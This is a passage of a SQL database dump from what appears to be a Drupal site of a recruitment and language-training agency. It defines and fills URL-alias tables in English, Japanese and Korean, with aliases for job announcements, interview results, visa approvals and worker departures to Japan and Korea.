(534, 534, '3b04e1b8-bd02-4f19-89b5-30104d2aed5a', 'en', '/node/121', '/activities/congrats-yee-yee-thant-nay-lin-aung', 1),
(535, 535, '5806e2bc-a121-4158-8df5-dad4ea52232f', 'ja', '/node/122', '/activities/1th-batch-internship-sushi-resturtant-21-2-2024', 1),
(536, 536, '53d8df47-c3f4-4f68-8efe-cbb9067b5660', 'en', '/node/122', '/activities/1th-batch-internship-sushi-resturtant-21-2-2024', 1),
(537, 537, 'ea31ce50-5ca6-45ca-a4c9-93d0d522fb21', 'ja', '/node/123', '/activities/congrats-khin-yu-mon-phyo-thae-ei-phyu', 1),
(538, 538, '2697b8b8-044f-4013-abed-dba9a0abe8b4', 'en', '/node/123', '/activities/congrats-khin-yu-mon-phyo-thae-ei-phyu', 1),
(539, 539, '1c3c2dec-36fa-4cf6-b068-0366b52518ca', 'ja', '/node/124', '/activities/congrats-thura-kyaw', 1),
(540, 540, '976b2e62-5707-46ef-8456-c4f254c3cccb', 'en', '/node/124', '/activities/congrats-thura-kyaw', 1),
(541, 541, '7b8d0874-3bd1-43af-81a7-e2548b547d26', 'ja', '/node/125', '/activities/congrats-may-thingyan-htun-naw-nay-dar-palu', 1),
(542, 542, '438bdc3a-2c81-4797-a0d3-9b147ae70ff5', 'en', '/node/125', '/activities/congrats-may-thingyan-htun-naw-nay-dar-palu', 1),
(543, 543, '5cd70197-540e-44f0-8d89-1b9df3d8b8cd', 'ja', '/node/126', '/activities/arrival-japan10-4-2024', 1),
(544, 544, '6b96958c-a14f-40fc-bc2f-56e19e3e196a', 'en', '/node/126', '/activities/arrival-japan10-4-2024', 1),
(545, 545, 'c98e3a8b-572e-41ee-a224-c48a80a0c9a6', 'ja', '/node/127', '/activities/congrats-yu-wai-phyo-soe-sandar-htwe-pann-ei-zaw', 1),
(546, 546, 'f6b6a545-3bb6-4cb5-8ce7-be3c050140fc', 'en', '/node/127', '/activities/congrats-yu-wai-phyo-soe-sandar-htwe-pann-ei-zaw', 1),
(547, 547, 'f5fe13d9-8ee1-48f5-a0d0-373d4c992bdb', 'ja', '/node/128', '/activities/congrats-nan-thae-nu-soe-ei-ei-min-hlaing-mee-mee-htike-pyae-su-su-san', 1),
(548, 548, '39276901-1460-42e2-b7fb-1c405c06bd25', 'en', '/node/128', '/activities/congrats-nan-thae-nu-soe-ei-ei-min-hlaing-mee-mee-htike-pyae-su-su-san', 1),
(549, 549, '34d1c9cb-6867-4322-857c-79d75211f26c', 'ja', '/node/129', '/activities/congrats-kay-thari-toe-may-hla-myo-nila-aung', 1),
(550, 550, 'a536603a-00b7-44eb-9805-8fd274b1413f', 'en', '/node/129', '/activities/congrats-kay-thari-toe-may-hla-myo-nila-aung', 1),
(551, 551, '862ad9aa-6891-40f0-94bf-573f35a240bf', 'ja', '/node/130', '/activities/congrats-0', 1),
(552, 552, 'a4a3427e-5739-47cc-bb9d-5c6a0686c043', 'en', '/node/130', '/activities/congrats-0', 1),
(553, 553, '0a65bbdb-f9a5-4371-83e5-da98b08ad8d7', 'ja', '/node/131', '/activities/congrats-kyaw-zin-latt', 1),
(554, 554, 'a8f83040-9f83-4f71-bcdc-0531c5f4b51d', 'en', '/node/131', '/activities/congrats-kyaw-zin-latt', 1),
(555, 555, '80768c4a-721e-4cf1-b44c-54b6370e5064', 'ja', '/node/132', '/activities/congratulations-yin-may-thu-yamin-shwe-zin', 1),
(556, 556, '0d7f9e79-f37e-43f3-9416-79ae6d81b50a', 'en', '/node/132', '/activities/congratulations-yin-may-thu-yamin-shwe-zin', 1),
(557, 557, 'db23a286-ac12-4fd9-807b-8b70c17c2edf', 'ja', '/node/133', '/activities/2nd-batch-pratical-class-completion', 1),
(558, 558, '69f0b531-8924-49f5-beb7-7b089550f85a', 'en', '/node/133', '/activities/2nd-batch-pratical-class-completion', 1),
(559, 559, 'c959a269-6d4d-43ee-84c6-4e100b36eeeb', 'ja', '/node/134', '/activities/congratulations-7-peson-passing-interview', 1),
(560, 560, '373e4ba5-847d-4817-9d31-a2dc72b048a3', 'en', '/node/134', '/activities/congratulations-7-peson-passing-interview', 1),
(561, 561, '1ac45adf-9378-4626-8a1e-ee1abd2c5b53', 'ja', '/node/135', '/activities/purpose-pratical-training', 1),
(562, 562, 'c12a72ed-3f45-4e12-83f2-87474df645bf', 'en', '/node/135', '/activities/purpose-pratical-training', 1),
(563, 563, '55de99b2-c5df-4a3f-9ef0-29570f0e3348', 'ja', '/node/136', '/activities/pratical-nursing-class', 1),
(564, 564, 'e7cbf5cb-3c7f-479c-8532-b4daa32ce1a8', 'en', '/node/136', '/activities/pratical-nursing-class', 1),
(565, 565, 'e0fe995b-20f0-401d-aa65-3ee30b1e181b', 'ja', '/node/137', '/activities/congratulations-nang-bwar-kyi-phray-myar-kaw-myar', 1),
(566, 566, '456ee3b9-a521-4245-a537-e30501622d72', 'en', '/node/137', '/activities/congratulations-nang-bwar-kyi-phray-myar-kaw-myar', 1),
(567, 567, '660f3474-b8a2-48c1-a103-491614245527', 'ja', '/node/138', '/activities/1st-batch-speaking-and-pratical-class-completion', 1),
(568, 568, 'c6347259-e5ae-4684-8683-19d23cb75680', 'en', '/node/138', '/activities/1st-batch-speaking-and-pratical-class-completion', 1),
(569, 569, 'a5e49a68-2905-4338-b109-215a78d9cf74', 'ja', '/node/139', '/activities/congratulations-hnin-wah-khaing-lay-lay-naing', 1),
(570, 570, 'af888933-1db0-43c6-9ca0-67f1cc43851b', 'en', '/node/139', '/activities/congratulations-hnin-wah-khaing-lay-lay-naing', 1),
(571, 571, '8ea571f3-10ca-46c1-ab49-73e45cebcdd4', 'ja', '/node/140', '/activities/1st-batch-theoretical-class-15-students', 1),
(572, 572, 'fbada7b9-4ef1-46e0-b78e-3153fb4b724a', 'en', '/node/140', '/activities/1st-batch-theoretical-class-15-students', 1),
(573, 573, 'a3614b7e-2299-4f72-ba2c-2aa2de449636', 'ja', '/node/141', '/activities/congrats-ei-ei-nyein-thu-zar-aung-bue-myar-shar', 1),
(574, 574, '46c611e0-88b7-42fc-a9c5-206698fc3407', 'en', '/node/141', '/activities/congrats-ei-ei-nyein-thu-zar-aung-bue-myar-shar', 1),
(575, 575, 'b69d2945-3e8f-4133-96bb-7a6b9ec5a5d5', 'ja', '/node/142', '/activities/commencement-new-comet-language-centre', 1),
(576, 576, '4de5153c-9cfc-49f9-8907-d6becd6d784b', 'en', '/node/142', '/activities/commencement-new-comet-language-centre', 1),
(577, 577, '7af22fec-4c0f-47b1-b256-b8d8ed00d31b', 'ja', '/node/143', '/activities/congratulations-hnin-wai-wai-nwe-thida-khine', 1),
(578, 578, '4e5d6ed4-717f-4549-9b9a-7a475c291f95', 'en', '/node/143', '/activities/congratulations-hnin-wai-wai-nwe-thida-khine', 1),
(579, 579, '113479c6-8116-4ecf-8c03-8a85bc21ed08', 'ja', '/node/144', '/activities/congratulations-aung-zin-oo-htet-wai-aung-htun-naing', 1),
(580, 580, '6a7d408d-0cdc-44fe-8a35-e0403085156b', 'en', '/node/144', '/activities/congratulations-aung-zin-oo-htet-wai-aung-htun-naing', 1),
(581, 581, 'fa391c16-9666-4387-9748-e3acef590e7a', 'ja', '/node/145', '/activities/congratulations-getting-coe-7', 1),
(582, 582, 'ae7a9bbf-7158-4047-bfb1-f93aa65665f7', 'en', '/node/145', '/activities/congratulations-getting-coe-7', 1),
(583, 583, 'b9900b3d-e8a2-40a4-ad8e-d10182d38526', 'ja', '/node/146', '/activities/congratulations-passing-interview', 1),
(584, 584, 'f0afe95f-4a35-44cc-a688-2ee1471e2eba', 'en', '/node/146', '/activities/congratulations-thet-htar-myint-ko-hsu-myat-hmue-hnin-yu-hlaing-wai-wai-khaing-chaw-hsu', 1),
(585, 585, '3630eb9f-5426-4bd8-bbec-523d9fedb997', 'ja', '/node/147', '/activities/congratulations-kyaw-zin-latt-getting-coe', 1),
(586, 586, '8bcd5660-09de-49b3-9ae9-210c84f647fe', 'en', '/node/147', '/activities/congratulations-kyaw-zin-latt-getting-coe', 1),
(587, 587, '816f9cef-7a6b-4c8f-b323-6b10fcc43d21', 'ja', '/node/148', '/activities/congratulations-getting-coe-8', 1),
(588, 588, '59a3fbf5-daf6-4444-a330-a5617a228281', 'en', '/node/148', '/activities/congratulations-getting-coe-8', 1),
(589, 589, 'f0889e35-2b6e-4bbb-807e-df9d83555dfd', 'en', '/node/149', '/activities/congratulations-passing-interview', 1),
(590, 590, '66adf407-409f-4c65-b3fd-a7ef81d7ba5a', 'ja', '/node/150', '/activities/training-about-cprkaigo', 1),
(591, 591, '96936b5b-b3dc-4b79-976c-8ee8dc335fc8', 'en', '/node/150', '/activities/training-about-cprkaigo', 1),
(592, 592, '0d829913-ffa5-499d-908e-9e95659fcbcd', 'ja', '/node/151', '/activities/congratulations-getting-coe-9', 1),
(593, 593, '1b8be147-72a2-473a-a006-b572df5b3344', 'en', '/node/151', '/activities/congratulations-getting-coe-9', 1),
(594, 594, 'd2fbc8dd-c408-4519-b9f4-023a09d55cd2', 'ja', '/node/152', '/activities/congratulation-getting-coe-1', 1),
(595, 595, '1c5808fe-3a4d-4eae-91f0-b34a3fca28a3', 'en', '/node/152', '/activities/congratulation-getting-coe-1', 1),
(596, 596, '1de90822-a5a4-40d6-a6e8-3025fb1ce5af', 'ja', '/node/153', '/activities/congratulations-getting-coe-10', 1),
(597, 597, 'f9d2df54-8e3a-4502-a991-3e890ec8ebba', 'en', '/node/153', '/activities/congratulations-getting-coe-10', 1),
(598, 598, '049a22fd-c914-47ad-99b7-4451588f4f68', 'ja', '/node/154', '/activities/tedingjinengjiehurencai5ming-ribenchufanoozhirase', 1),
(599, 599, 'fdd7234a-5216-44aa-bd5d-cbada924fce0', 'en', '/node/154', '/activities/five-caregiver-workers-departed-japan-under-specified-skilled-worker-kaigo-program', 1),
(600, 600, '58e0bc7b-6911-422a-ab17-bf7f55d17ffe', 'ja', '/node/155', '/announcement/hoterufenye-tedingjinengshiyanduicekurasukaijiangnoozhirase', 1),
(601, 601, '5e2b45ca-c45c-4bdd-b795-71599d4c602f', 'en', '/node/155', '/announcement/new-hotel-tokutei-preparation-class-now-open', 1),
(602, 602, '07574876-2fb7-41c2-bdae-75e2042d82f6', 'ja', '/node/156', '/activities/chuguobaogao-tedingjinengwaishiyeteribenhechufashimashita', 1),
(603, 603, 'b3b181b7-9800-4967-babf-630e58d73bed', 'en', '/node/156', '/activities/departure-japan-specified-skilled-worker-food-service-industry', 1),
(604, 604, 'd04bd212-ff38-4b6e-b29e-5443fc83bae5', 'ja', '/node/157', '/activities/chuguobaogao-tedingjinengwaishiyete9mingkaribenhechufashimashita', 1),
(605, 605, '35681da4-fe2a-4dd0-bb4b-8553e3830c9e', 'en', '/node/157', '/activities/group-departure-japan-specified-skilled-worker-food-service-industry', 1),
(606, 606, 'c348bf14-e20a-44b0-8f54-846ec80bc5fa', 'ja', '/node/160', '/activities/tedingjinengwaishiyemianjiehegenokobaogao', 1),
(607, 607, 'ea4a9478-a552-4a33-8645-bb77d4295706', 'en', '/node/160', '/activities/candidate-successfully-passed-tokutei-food-service-interview', 1),
(608, 608, 'e764a967-26e8-4952-bf1d-984e2f14d3c6', 'ja', '/node/161', '/activities/tedingjinengwaishiyemianjiehegenoozhirase', 1),
(609, 609, '199f3b26-2504-4234-8865-78e55c217346', 'en', '/node/161', '/activities/candidate-successfully-passed-tokutei-food-service-interview-0', 1),
(610, 610, '10ef4103-f566-45d1-be74-229265511bdc', 'ja', '/node/162', '/announcement/aizhixian-fangwenjiehusutatsufumujitedingjinengjiehu', 1),
(611, 611, '95c7b1dd-5b80-4310-b9f3-47a2473721c4', 'en', '/node/162', '/announcement/home-care-caregiver-position-available-aichi-japan', 1),
(612, 612, 'acacd283-a74c-4fc6-928b-602c1d845d12', 'ja', '/node/163', '/announcement/tedingjinengnongyesutatsufumujicichengxiantsukuhashi', 1),
(613, 613, 'e2ff6801-334c-4543-9807-edc6e4dd7c66', 'en', '/node/163', '/announcement/agriculture-workers-wanted-tokutei-program-japan', 1),
(614, 614, 'fc64688f-76b8-4b49-b252-773edd1cd475', 'ja', '/node/164', '/activities/tedingjinengsuporencai-ribenchufanoozhirase', 1),
(615, 615, 'b68cd472-d175-471f-b6f4-58006997dacc', 'en', '/node/164', '/activities/hotel-worker-begins-career-journey-japan', 1),
(616, 616, 'eb2b627d-b6de-4543-b7b6-1b9d8b2a0a06', 'ja', '/node/165', '/activities/tedingjinengjiehurencai4ming-ribenchufanoozhirase', 1),
(617, 617, '1ed71abd-2297-451a-93f5-57ad3c562200', 'en', '/node/165', '/activities/four-caregiver-workers-departed-japan', 1),
(618, 618, '6c874248-0a40-4187-86e6-5ecdbcce81ab', 'ja', '/node/166', '/activities/tedingjinengsupomianjiehegenoozhirase', 1),
(619, 619, 'a9221af7-84a7-442c-9145-93900eeac889', 'en', '/node/166', '/activities/candidate-successfully-passed-tokutei-hotel-interview', 1),
(620, 620, '91f9d6a0-20d9-4eeb-ad21-21fb89c7d192', 'ja', '/node/167', '/activities/tedingjinengwaishiyerencai4ming-ribenchufanoozhirase', 1),
(621, 621, '49a23894-a1b7-41b5-b29b-a293c7edad7e', 'en', '/node/167', '/activities/four-food-service-workers-departed-japan', 1),
(622, 622, 'f2cd5778-a8d5-4c3d-b6fe-90b10c84c59d', 'ja', '/node/168', '/activities/tedingjinengsupomianjiehegenoozhirase-0', 1),
(623, 623, 'e522c0dc-1a81-47ca-9ad9-5c3214d6fcbf', 'en', '/node/168', '/activities/candidate-successfully-passed-tokutei-hotel-interview-0', 1),
(624, 624, 'e7ddb379-5417-4f42-b90d-b058eab63053', 'ja', '/node/169', '/activities/tedingjinengjiehurencai3ming-ribenchufanoozhirase', 1),
(625, 625, 'c0e189c1-a17d-40b0-9bad-3cd3b54831ce', 'en', '/node/169', '/activities/three-caregiver-workers-departed-japan', 1),
(626, 626, 'f76767a5-8f01-4882-94d7-34f992e6a2d4', 'ja', '/node/170', '/activities/tedingjinengjiehumianjiehegenoozhirase', 1),
(627, 627, 'ac4d5eba-efeb-4fd1-92ac-920e42cee53a', 'en', '/node/170', '/activities/candidate-successfully-passed-tokutei-kaigo-interview', 1),
(628, 628, '7f210e6e-ab52-4ca0-ac90-edda7d0724e4', 'ja', '/node/171', '/activities/tedingjinengjiehurencai-ribenchufanoozhirase', 1),
(629, 629, '5acbe106-76ca-44c9-9578-0950fa8e2f64', 'en', '/node/171', '/activities/caregiver-begins-new-career-journey-japan', 1),
(630, 630, '8c2ae133-8b15-4d58-b00b-1078689ebdf7', 'ja', '/node/173', '/activities/tedingjinengwaishiyerencai9ming-xintanakiyariahenochufa', 1),
(631, 631, 'c1586cbd-6185-429a-bedd-b0f255238931', 'en', '/node/173', '/activities/nine-food-service-workers-begin-their-new-careers-japan', 1),
(632, 632, '7e86ddaf-8922-42f2-8170-97ec007f5a79', 'ja', '/node/174', '/activities/tedingjinengwaishiyerencai-ribentenoxintanasutato', 1),
(633, 633, '079841ab-e249-4a53-8d49-50a32dfe31d8', 'en', '/node/174', '/activities/new-opportunity-begins-japans-food-service-industry', 1),
(634, 634, 'b96b900c-d40e-44b5-9dff-87a98de6a466', 'ja', '/node/175', '/activities/tedingjinengwaishiyerencai-ribentenoxintanatiaozhan', 1),
(635, 635, '6f116e2a-e1d0-4be7-ac2d-16d0f08575bb', 'en', '/node/175', '/activities/starting-new-journey-japans-food-service-industry', 1),
(636, 636, '6545f2ad-8129-4e8f-9137-28242455e013', 'ja', '/node/176', '/activities/tedingjinengwaishiyerencai2ming-ribenchufanoozhirase', 1),
(637, 637, '5616496f-6657-479e-85ad-00837180c57c', 'en', '/node/176', '/activities/two-food-service-workers-set-japan', 1),
(638, 638, '5a7a596b-1121-4b70-97fe-dac8b362bf69', 'ja', '/node/177', '/activities/tedingjinengwaishiyerencai-ribentenoxintanayibu', 1),
(639, 639, 'e512b4f6-cc2c-4b9e-ad45-45a9078268f6', 'en', '/node/177', '/activities/food-service-worker-begins-new-chapter-japan', 1),
(640, 640, '6eca1527-5989-4ff7-9145-2cfaa8aeb459', 'ja', '/node/178', '/activities/tedingjinengjiehumianjiehegenoozhirase-0', 1),
(641, 641, 'e0393e77-e5b9-4197-83d0-27d669884053', 'en', '/node/178', '/activities/successful-step-toward-caregiving-career-japan', 1),
(642, 642, 'f2227bbd-2f46-4d67-9503-43955f4c7801', 'ja', '/node/179', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-0', 1),
(643, 643, 'ad73bfd1-f613-4fc3-8203-471d42231add', 'en', '/node/179', '/activities/successful-food-service-interview-result', 1),
(644, 644, 'be25ac63-c050-4152-a0bf-633f6ee9b440', 'ja', '/node/180', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-1', 1),
(645, 645, 'dc911cbe-0157-4b64-8d94-383d2e0606d7', 'en', '/node/180', '/activities/food-service-candidate-achieves-interview-success', 1),
(646, 646, 'e38c2561-1f49-4ecb-890e-e35df1c294eb', 'ja', '/node/181', '/activities/jlpt-n3hegenoozhirase', 1),
(647, 647, '02de233d-1b86-4347-9963-a25e071da892', 'en', '/node/181', '/activities/student-successfully-passed-jlpt-n3-examination', 1),
(648, 648, 'd33843f0-5f50-4ad9-8cf3-47acd58a27ee', 'ja', '/node/182', '/activities/n5karan3he-xuexichengguonokobaogao', 1),
(649, 649, 'cd9c2471-b405-4044-8afe-6144daf68e7f', 'en', '/node/182', '/activities/n5-n3-successful-learning-journey', 1),
(650, 650, '55f9d73e-e4c6-4135-bd90-577e415dc3f1', 'ja', '/node/183', '/activities/jlpt-n3hegeniyoriguangkaruxintanakenengxing', 1),
(651, 651, '46280458-13b6-456e-a851-eee74ad5b5cc', 'en', '/node/183', '/activities/jlpt-n3-success-opens-new-opportunities', 1),
(652, 652, 'd942ec71-3237-420d-b5da-ec61c85e66d3', 'ja', '/node/184', '/activities/tedingjinengwaishiyerencai2ming-ribenchufanoozhirase-0', 1),
(653, 653, 'd77f181c-ef47-437f-aeba-2b4078332941', 'en', '/node/184', '/activities/two-food-service-workers-depart-japan-after-months-preparation', 1),
(654, 654, '32742a49-33a1-4a9f-8624-835f0c199984', 'ja', '/node/185', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-2', 1),
(655, 655, 'e66f517b-83a3-4217-bcdb-da5c0f9a279d', 'en', '/node/185', '/activities/food-service-candidate-successfully-advances-next-stage', 1),
(656, 656, '55898292-e2cf-45d7-9807-a298b31828f4', 'ja', '/node/186', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-3', 1),
(657, 657, '53e08947-78f4-4fbe-ada5-94c71b49d2e5', 'en', '/node/186', '/activities/food-service-candidate-demonstrates-readiness-career-japan', 1),
(658, 658, '272a9af0-40d6-4840-a23c-6528d65786c3', 'ja', '/node/187', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-4', 1),
(659, 659, '972fbd2d-0594-44ec-86c6-9b12f022e2cb', 'en', '/node/187', '/activities/promising-future-begins-interview-success', 1),
(660, 660, '933d1890-e02e-420c-975b-2a135c23038e', 'ja', '/node/188', '/activities/tedingjinengjiehumianjiehegenoozhirase-1', 1),
(661, 661, '9e200d53-2a0e-45aa-a1fd-6a6d783a046b', 'en', '/node/188', '/activities/successful-interview-result-future-caregiver-japan', 1),
(662, 662, '23963ed3-9926-4064-a179-01b27d537bee', 'ja', '/node/189', '/activities/tedingjinengjiehumianjiehegenoozhirase-2', 1),
(663, 663, 'd47f9b88-1b11-4577-aeea-aa777b99f5dd', 'en', '/node/189', '/activities/commitment-and-dedication-lead-interview-success', 1),
(664, 664, '036b445f-44bd-4289-b8cb-bab51b53bd72', 'ja', '/node/190', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-5', 1),
(665, 665, '5f044139-0187-4b48-90ee-b2136bf2314f', 'en', '/node/190', '/activities/preparation-and-determination-lead-interview-success', 1),
(666, 666, 'bd8c4bf1-e38b-4017-b0c7-81944e47a0f7', 'ja', '/node/191', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-6', 1),
(667, 667, '68a6ea31-da31-47a5-9591-16fe545a667f', 'en', '/node/191', '/activities/hard-work-recognized-through-interview-success', 1),
(668, 668, '9b36d2f6-b8a2-4851-a25b-b84d39229bbd', 'ja', '/node/192', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-7', 1),
(669, 669, '4560faf7-dcb9-4560-8314-05786fb4ffb5', 'en', '/node/192', '/activities/persistence-and-dedication-result-interview-success', 1),
(670, 670, '3a065f43-1c3e-438c-a4c4-8f5df338175b', 'ja', '/node/193', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-8', 1),
(671, 671, '5fa8d748-24eb-4a2b-85f0-e06329611cfe', 'en', '/node/193', '/activities/interview-success-marks-beginning-new-opportunities', 1),
(672, 672, 'bf13fc43-5198-45a7-977b-266d7ad2bfd2', 'ja', '/node/194', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-9', 1),
(673, 673, '09dd8149-602c-4ed8-83b3-f450575954db', 'en', '/node/194', '/activities/successful-interview-opens-door-international-experience', 1),
(674, 674, '458d0aa6-acd8-4393-8a53-8336db42629a', 'ja', '/node/195', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-10', 1),
(675, 675, '3bd6d33f-47bc-4f07-af9f-336836d666a8', 'en', '/node/195', '/activities/building-skills-and-opportunities-through-success', 1),
(676, 676, 'e9e1a489-e4cf-458c-80e9-fa6425f09d4d', 'ja', '/node/196', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-11', 1),
(677, 677, '95e0b282-f1f7-43f5-a5af-a241bb13ab0f', 'en', '/node/196', '/activities/determination-leads-interview-success', 1),
(678, 678, '4e72f80f-cc0a-4117-94c6-74c9bd31c17a', 'ja', '/node/197', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-12', 1),
(679, 679, 'a09e0df7-702e-482f-a21c-cb21fb45660d', 'en', '/node/197', '/activities/interview-success-opens-new-possibilities-japan', 1),
(680, 680, '444fecc3-e36f-45cc-8a45-f7c53d6a94ed', 'ja', '/node/198', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-13', 1),
(681, 681, '6d2c6cd6-87f3-48b3-b47e-b381a75bee60', 'en', '/node/198', '/activities/significant-achievement-toward-career-japan', 1),
(682, 682, '3ea21994-34f6-402b-a14f-765e2cfc114a', 'ja', '/node/199', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-14', 1),
(683, 683, '09daff3b-aefd-4cf3-9394-60911487911e', 'en', '/node/199', '/activities/turning-effort-success-interview-passed', 1),
(684, 684, '7efedf6a-f43d-4cdb-81e7-76f9576cf9c4', 'ja', '/node/200', '/activities/tedingjinengwaishiyemianjiehegenoozhirase-15', 1),
(685, 685, 'c5b5276c-c809-45fb-a8eb-ef355db1b6f4', 'en', '/node/200', '/activities/ready-next-challenge-interview-successfully-passed', 1),
(686, 686, '4d368d51-b236-4aaa-8ac0-7774e4b67b22', 'ja', '/node/204', '/language-center/title-1', 1),
(687, 687, 'bfc85d1f-29ce-4587-9bd2-266c56f68ffd', 'en', '/node/204', '/language-center/title-1', 1),
(688, 688, 'db20cd94-7c9b-45e5-b243-e91f97de5552', 'ja', '/node/205', '/language-center/title-2', 1),
(689, 689, '0f01b14f-7eb6-4a9d-847e-a22dd4792a4c', 'en', '/node/205', '/language-center/title-2', 1);

-- --------------------------------------------------------

--
-- Table structure for table `path_alias_revision`
--

CREATE TABLE `path_alias_revision` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `path` varchar(255) DEFAULT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `status` tinyint NOT NULL,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for path_alias entities.';

--
-- Dumping data for table `path_alias_revision`
--

INSERT INTO `path_alias_revision` (`id`, `revision_id`, `langcode`, `path`, `alias`, `status`, `revision_default`) VALUES
(5, 5, 'en', '/node/5', '/announcement/5-positions-those-who-have-passports-and-want-work-general-workers-construction-sites', 1, 1),
(10, 10, 'en', '/node/10', '/announcement/expert-engineers-who-want-work-south-korea-shipyards-electrical-engineer-position-are', 1, 1),
(18, 18, 'en', '/node/18', '/announcement/food-beverage-hostess-work-5-stars-hotels-dubai-or-abu-dhabi-are-wanted-desperately', 1, 1),
(53, 53, 'ja', '/node/10', '/announcement/韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1, 1),
(54, 54, 'ja', '/node/18', '/announcement/ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1, 1),
(55, 55, 'ko', '/node/10', '/announcement/expert-engineers-who-want-work-south-korea-shipyards-electrical-engineer-position-are', 1, 1),
(56, 56, 'ko', '/node/18', '/announcement/food-beverage-hostess-work-5-stars-hotels-dubai-or-abu-dhabi-are-wanted-desperately', 1, 1),
(61, 61, 'ko', '/node/5', '/announcement/5-positions-those-who-have-passports-and-want-work-general-workers-construction-sites', 1, 1),
(74, 74, 'ja', '/node/5', '/announcement/パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1, 1),
(92, 92, 'ja', '/node/62', '/announcement/2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1, 1),
(93, 93, 'en', '/node/62', '/announcement/2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1, 1),
(368, 368, 'ja', '/node/206', '/language-center/title-3', 1, 1),
(369, 369, 'ja', '/node/1', '/content/bisheuefusaito', 1, 1),
(370, 370, 'en', '/node/1', '/content/about-us', 1, 1),
(371, 371, 'ko', '/node/1', '/content/about-us', 1, 1),
(372, 372, 'ja', '/node/3', '/announcement/e-7-3-rongjiekurasunihashuikacanjiasuhekitesuka', 1, 1),
(373, 373, 'en', '/node/3', '/announcement/who-should-attend-e-7-3-welding-class', 1, 1),
(374, 374, 'ko', '/node/3', '/announcement/who-should-attend-e-7-3-welding-class', 1, 1),
(375, 375, 'ja', '/node/4', '/announcement/wanted-desperately', 1, 1),
(376, 376, 'en', '/node/4', '/announcement/wanted-desperately', 1, 1),
(377, 377, 'ko', '/node/4', '/announcement/contact-us-more-information', 1, 1),
(378, 378, 'ja', '/node/6', '/activities/e7', 1, 1),
(379, 379, 'en', '/node/6', '/activities/order-get-employed-shipyard-korea-e7-3-visa-trainees-are-explained-what-needed-quickly', 1, 1),
(380, 380, 'ko', '/node/6', '/activities/kiuriiyaaniungngnri-sngbheaakngkiu-e7-3-viza-nai-saareaakniungphiu-sngttnsaamaakiu', 1, 1),
(381, 381, 'ja', '/node/7', '/activities/e-7hisahawaiguorenniduisurutedingnengliwochitsufangnotamenotebienahisatesu', 1, 1),
(382, 382, 'en', '/node/7', '/activities/e-7-visa-special-ability-visa-foreign-nationals', 1, 1),
(383, 383, 'ko', '/node/7', '/activities/e-7-visa-special-ability-visa-foreign-nationals', 1, 1),
(384, 384, 'ja', '/node/8', '/activities-0', 1, 1),
(385, 385, 'en', '/node/8', '/activities/wanted-people-who-want-work-welder-expert-welding-technician-korea-shipyard', 1, 1),
(386, 386, 'ko', '/node/8', '/activities/korea-sngbheaakngttng-welder-kmkng-ghecheaapnnyaarng-aphc-saareaak-lupkiungliusuumaa', 1, 1),
(387, 387, 'ja', '/node/9', '/activities-1', 1, 1),
(388, 388, 'en', '/node/9', '/activities/first-batch-welding-trainees-new-comet-trading-agency-coltd-sinmalike-shipyard-was-met', 1, 1),
(389, 389, 'ko', '/node/9', '/activities/chngmliuk-sngbheaakngm-new-comet-trading-agency-coltd-m-pthmasutt-ghecheaa', 1, 1),
(390, 390, 'ja', '/node/11', '/content/owenihewase', 1, 1),
(391, 391, 'en', '/node/11', '/content/contact-us', 1, 1),
(392, 392, 'ko', '/node/11', '/content/yeonlagcheo', 1, 1),
(393, 393, 'ja', '/node/17', '/activities-2', 1, 1),
(394, 394, 'en', '/node/17', '/activities/first-batch-welding-trainees-new-comet-trading-agency-coltd-sinmalai-shipyard-was-met', 1, 1),
(395, 395, 'ko', '/node/17', '/activities/chngmliuksngbheaakngm-new-comet-trading-agency-coltd-m-pthmasuttghecheaasngttnsaamaaaaa', 1, 1),
(396, 396, 'ja', '/node/19', '/activities/di1hatsuchikara60renyishangnofangkarongjiejishuzhenoe-7', 1, 1),
(397, 397, 'en', '/node/19', '/activities/over-60-people-1st-batch-came-register-koshipa-skill-test-go-korea-welding-technician', 1, 1),
(398, 398, 'ko', '/node/19', '/activities/over-60-people-1st-batch-came-register-koshipa-skill-test-go-korea-welding-technician', 1, 1),
(399, 399, 'ja', '/node/20', '/activities/di2huisheng-yanxiushengdatojinian', 1, 1),
(400, 400, 'en', '/node/20', '/activities/memorial-photo-2nd-batch-welding-students', 1, 1),
(401, 401, 'ko', '/node/20', '/activities/memorial-photo-2nd-batch-welding-students', 1, 1),
(402, 402, 'ja', '/node/23', '/content/huisheqingbao', 1, 1),
(403, 403, 'en', '/node/23', '/content/company-profile', 1, 1),
(404, 404, 'ko', '/node/23', '/content/hoesa-seollib', 1, 1),
(405, 405, 'ja', '/node/24', '/content/shiyeneirong', 1, 1),
(406, 406, 'en', '/node/24', '/content/our-services', 1, 1),
(407, 407, 'ko', '/node/24', '/content/hoesa-seobiseu', 1, 1),
(408, 408, 'ja', '/node/25', '/content/mubiao-mitsushiyon', 1, 1),
(409, 409, 'en', '/node/25', '/content/vision-mission', 1, 1),
